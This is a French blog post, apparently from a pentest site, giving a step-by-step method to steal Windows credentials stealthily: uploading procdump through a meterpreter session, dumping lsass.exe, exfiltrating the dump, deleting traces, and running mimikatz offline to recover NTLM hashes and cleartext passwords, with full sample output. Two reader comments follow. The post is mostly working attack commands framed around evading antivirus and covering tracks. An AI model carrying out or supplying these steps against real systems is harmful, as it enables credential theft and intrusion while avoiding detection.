Dumper les creds en mémoire discrètement.

Posted on September 25, 2014 by thanatos

Comment dumper les crédentials windows en mémoire sans faire couiner aucun antivirus. prérequis évidemment, admin local.

 

Etape 1, uploader procdump de m. Russinovich. Procdump est FUD car signé par microsoft :)

meterpreter > upload /tmp/procdump.exe c:\
[*] uploading  : /tmp/procdump.exe -> c:\
[*] uploaded   : /tmp/procdump.exe -> c:\\procdump.exe

Etape 2, dumper le process lsass.exe

meterpreter > shell
Process 2964 created.
Channel 3 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp

ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

[00:50:53] Dump 1 initiated: c:\lsass.dmp
[00:50:54] Dump 1 complete: 45 MB written in 1.0 seconds
[00:50:54] Dump count reached.

C:\>exit
meterpreter > download c:\lsass.dmp
[*] downloading: c:lsass.dmp -> c:lsass.dmp
[*] downloaded : c:lsass.dmp -> c:lsass.dmp

 étape 3, cleanup

meterpreter > rm lsass.dmp
meterpreter > rm procdump.exe

 étape 4, Sur un tout autre ordinateur que vous contrôlez, sous windows et sans AV qui fait suer.

C:\…>mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" sekurlsa::logonPasswords exit

Authentication Id : 0 ; 948221610 (00000000:3884b6aa)
Session : Interactive from 0
User Name : mydomainadmin
Domain : ACME-98E7776C60
SID : S-1-5-21-1499439441-4023663837-4023423450-1020
 msv :
 [00000002] Primary
 * Username : mydomainadmin
 * Domain : ACME-98E7776C60
 * LM : 08A068EB2E431EA878D28D900476A7E1
 * NTLM : 0229a7a4cd52062d9480fb4dbe41d41a
 * SHA1 : 21bd12dc183f740ee76f27b78eb39c8ad972a757
 wdigest :
 * Username : mydomainadmin
 * Domain : ACME-98E7776C60
 * Password : P@ssw0rd
 kerberos :
 * Username :mydomainadmin
 * Domain : ACME-98E7776C60
 * Password : P@ssw0rd
  ssp :
  credman :

Attention de respecter la même archi ou tournera le mimikatz; séparez 32 et 64 Bits… et séparez 2K XP 2K3 de Vista, 7, 8 et2K8.

Note: Merci au Gentilkiwi pour sa relecture attentive :)

This entry was posted in Pentest, Windows and tagged , . Bookmark the permalink.

4 Responses to Dumper les creds en mémoire discrètement.

  1. XenocodeRCE says:
    September 26, 2014 at 22:52

    «Etape 1, UPLOADER procdump de m. Russinovich.» Je vais voir le monsieur, je le défonce à coup de pelle avant d’aller sur son ordi et j’héberge le bouzin sur un site tiers ? Ou alors On s’est trompé de mot ? :)

    Reply
  2. Xels says:
    October 1, 2014 at 11:19

    Salut,
    Pourquoi changer de machine? Vous parlez d’une histoire d’antivirus, mais je ne vois pas pourquoi. A moins que mimikatz ne fasse matcher les antivirus?
    Sinon, plutôt grisant de voir qu’avec une application fournie par MS, on peut retrouver des mdp…. Chouette manip merci!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

AlphaOmega Captcha Classica  –  Enter Security Code